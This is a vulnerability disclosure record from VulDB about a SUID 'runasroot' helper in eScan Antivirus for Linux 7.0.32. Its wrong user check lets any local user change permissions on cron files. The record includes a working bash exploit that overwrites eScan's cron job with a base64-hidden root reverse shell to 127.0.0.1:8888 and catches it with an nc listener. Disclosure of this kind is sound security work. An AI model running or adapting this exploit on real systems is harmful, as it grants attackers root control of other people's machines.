| Title | Incorrect UID check leads to privilege escalation (eScan antivirus Linux version 7.0.32) |
|---|
| Description | # Description
EScan Antivirus Linux version 7.0.32 has a SUID file `runasroot`. This program has a logic bug at checking user's condition to execute `chmod` command as root, allowing attacker edit eScan's cronjob, inject malicious command and gain system's control as root
# Root cause
`runasroot` as a condition to verify if current user has privilege to run privileged `chmod` (provided by `runasroot`). An incorrect operator allowed any user to run `chmod` commands crafted by `runasroot` (screenshot: https://user-images.githubusercontent.com/29118926/248438900-a591be40-57de-4e67-a94b-cbdb086386ca.png). The `runasroot` of eScan AV allows permission changes for some files, including the cronjob files (screenshot: https://user-images.githubusercontent.com/29118926/248438420-6f8bec35-d3d8-4b8c-b0b1-d91df403a356.png)
By default, eScan antivirus writes 2 crontabs to system after installation (screenshot: https://user-images.githubusercontent.com/29118926/248438463-2e6f878b-6023-4dfd-8611-0e46117370a2.png)
Attacker can exploit this logic, change permission of existed crontab, inject malicious code to execute command as root, then gain full control of the system.
# Exploit
```
#!/bin/bash
# Modify permission of crontab
/opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate
# Modify crontab to run malicious command
echo "KiAqICogKiAqIHJvb3QgYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzg4ODggPCYxJwo=" | base64 -d > /opt/MicroWorld/etc/mwavupdate
/opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate
nc -nvlp 8888
``` |
|---|
| Source | ⚠️ https://gist.github.com/dmknght/ac489cf3605ded09b3925521afee3003 |
|---|
| User | dmknght (UID 51830) |
|---|
| Submission | 07/31/2023 08:35 (3 years ago) |
|---|
| Moderation | 08/16/2023 15:06 (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 237315 [MicroWorld eScan Anti-Virus 7.0.32 on Linux runasroot incorrect execution-assigned permissions] |
|---|
| Points | 20 |
|---|